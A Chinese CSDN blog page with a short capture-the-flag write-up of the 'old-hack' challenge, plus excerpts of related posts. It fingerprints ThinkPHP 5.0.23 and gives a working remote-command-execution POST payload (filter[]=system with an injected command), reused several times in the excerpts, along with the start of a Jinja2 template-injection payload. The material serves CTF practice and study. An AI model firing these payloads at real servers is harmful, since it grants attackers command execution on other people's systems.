[BJDCTF 2nd]old-hack -wp

最新推荐文章于 2020-11-12 14:42:37 发布
最新推荐文章于 2020-11-12 14:42:37 发布
阅读量365 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freerats/article/details/107130489
版权

在这里插入图片描述
进入网站,看到提示,powered By THINKPHP5
知道肯定与thinkphp5有关
传入一个s=1报错查看一下信息(这里要遇见过才知道,没什么技巧)
在这里插入图片描述
版本为50.0.23

在这里插入图片描述post提交

_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /

触发命令执行漏洞

在这里插入图片描述
cat /flag

在这里插入图片描述

冰可乐不加可乐
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
[BJDCTF 2nd]old-hack
fightte的博客
05-18 90
算是碰到的第一道TP5的题目: 界面如上: 查看是典型的thinkphp的漏洞: 输入?s=1 得到更多信息: 尝试post输入如下payload,可以构成命令执行漏洞: _method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / 尝试把ls改为cat等,得出flag ...
[BJDCTF 2nd] web题-old-hack
BROTHERYY的博客
07-13 327
复现环境:buuoj.cn 发现是thinkphp5,让页面报错找到了具体的版本号。 上网找了这个漏洞的payload POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / 使用hackbar的post传递这个参数进去,查看根目录下的文件 读取flag flag{dc909607-e27c-40a9-86e8-2de6079ed503} ...
[BJDCTF 2nd] old-hack
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-22 713
漏洞:ThinkPHP 5.0.23 RCE 参考https://www.codercto.com/a/54587.html http://ip_addr/index.php?s=captcha payload _method=__construct&filter[]=system&method=get&get[]=whoami
【学习笔记14】buu [BJDCTF 2nd]old-hack
weixin_43553654的博客
05-14 319
首先打开网站一看,映入眼球,thinkphp,但是不知道是什么版本的所以就想办法构造一个报错来让它显示一些更详细的信息http://59429912-fc6a-4d2d-945a-c1aabf47f19f.node3.buuoj.cn/?s=3 这样就可以看到thinkphp的版本了是5.0.23版本接下来就简单了求助度娘,查找thinkphp5.0.23对应版本的漏洞最后在...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
2nd Life-开源
04-26
2nd Life-开源》项目是一个致力于将传统的83+ /银版角色扮演游戏(RPG)移植到在线环境中的创新尝试。这个项目以其独特的创意和开放源代码的特性,为玩家提供了一个全新的游戏体验,同时也为开发者提供了一个探索...
Tab Kit 2nd Edition-开源
07-18
TabKit(firefox 扩展)被作者放弃。 我对其进行了编辑以使其与 Firefox 4+ 兼容。
[BJDCTF 2nd]old-hack ctf
wuyaowangchuan的博客
11-09 186
[BJDCTF 2nd]old-hack 告诉了我们是THINKPHP5的漏洞 搜这个版本的漏洞 发现是thinkphp5.0.23的命令执行 THINKPHP 5.0.X-5.0.23、5.1.X、5.2.X 全版本远程代码执行漏洞分析 ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析 直接用payload _method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / _method=__construct&
CTF——Thinkphp5远程命令执行漏洞利用
qq_45521281的博客
05-03 7326
[BJDCTF 2nd]old-hack(5.0.23) 进入之后: 打开页面,页面提示powered by Thinkphp。说明可能和thinkphp框架有关。也确实如此,这里用到了thinkphp5的远程命令执行漏洞。 Thinkphp5远程命令执行漏洞 漏洞描述:由于thinkphp对框架中的核心Requests类的method方法提供了表单请求伪造,该功能利用 $_POST['_meth...
BJDCTF 2nd WEB
A_dmin的博客
03-24 7384
BJDCTF 2nd WEB emmm,比赛做了几道题,赛后官方给了wp,把没做出来的复现一下,,,, [BJDCTF 2nd]fake google 一个SSTI,发现是jinja2的,直接用payload打就行: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='_IterationGuard' %...
BJDCTF 2nd pwn Writeup
starssgo的博客
03-23 3118
博客地址 没做完…没出的题复现了补上去… r2t3 整数溢出,还是比较简单的 # -*- coding: utf-8 -* from pwn import * from LibcSearcher import * context.log_level = 'debug' context.arch = 'amd64' elf = ELF('r2t3') p = 0 def pwn(ip,port,de...
[BJDCTF 2nd]old-hack 1
feng的博客
11-12 979
WP 一道直接利用thinkphp的RCE洞的题目。 首先进入环境,得知这是一个thinkphp5,通过输入?s=1来报错,获得版本信息(是一个小姿势): tp5.0.23这个版本以及相近的版本以RCE而出名的,去网上搜一波payload,搜到了: ?s=1 _method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / 直接打就可以执行。 不过我一开始执行的时候,光看到了 system(): Cannot execu
BJDCTF 2nd菜鸡做题记录
bmth666的博客
03-25 3115
文章目录 萌新赛 做了一下web,感觉还没有入门,太难了吧,然后看大佬博客把能写的复现一下 [BJDCTF 2nd]简单注入 这道题没写出来,想了好久才想到可以用\转义掉',然后就开始盲注,发现禁用了select,尝试绕过未果,卡死,看师傅文章才发现可以正则匹配出password,妙呀,先写一下我的思路 username=\ password=...
BUUCTF old hack
zydbk123456的博客
04-26 617
1.打开页面,获取提示信息 打开页面,页面提示powered by Thinkphp。说明可能和thinkphp框架有关。也确实如此,这里用到了thinkphp5的远程命令执行漏洞。在用这个thinkphp的漏洞前,先了解一下有关thinkphp的一些基础知识: thinkphp是一个用来简化企业应用开发和敏捷WEB应用的php框架。thinkphp包含了底层架构、兼容处理、基类库、数据库访问...
[BJDCTF 2nd] diff2
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-24 882
题目下载地址:点此下载 这里存在溢出漏洞 一般师傅:char + char = char 没毛病 keer师傅:char + char = 溢出!怼他! 我们知道char型变量占1个字节,相当于unsigned byte,表示范围是0x0-0xff,那么两char相加的范围就是0x0 - 0x1fe ,可是char型只能存储1个字节的数据,因此两char相加产生的进位就会被忽略。举个栗子,0x...
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2738
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
《The Shellcoders Handbook》2nd Edition - 无水印英文PDF
"《Shellcoders Handbook 2nd Edition》是一部关于网络安全和漏洞利用的经典书籍,由Chris Anley、John Heasman、Felix "FX" Linder和Gerardo Richarte等人共同撰写。这本书是第一版的更新和扩展,旨在帮助读者深入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值